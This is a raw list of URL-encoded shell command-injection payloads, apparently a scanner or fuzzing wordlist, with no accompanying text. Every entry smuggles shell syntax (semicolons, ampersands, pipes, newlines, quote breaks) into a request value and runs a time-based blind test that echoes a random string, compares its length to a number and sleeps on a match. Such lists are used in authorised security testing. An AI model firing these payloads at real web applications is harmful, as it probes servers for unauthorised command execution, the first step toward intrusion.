+%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526 +%7C%20%5B%201%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%202%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%203%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%204%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%205%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%206%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%207%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%208%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%7C%20%5B%209%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526 +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C +%7C%20%5B%201%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%202%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%203%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%204%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%205%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%206%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%207%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%208%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%7C%20%5B%209%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20 +%27%7C%20%5B%201%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%202%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%203%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%204%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%205%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%206%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%207%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%208%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%7C%20%5B%209%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 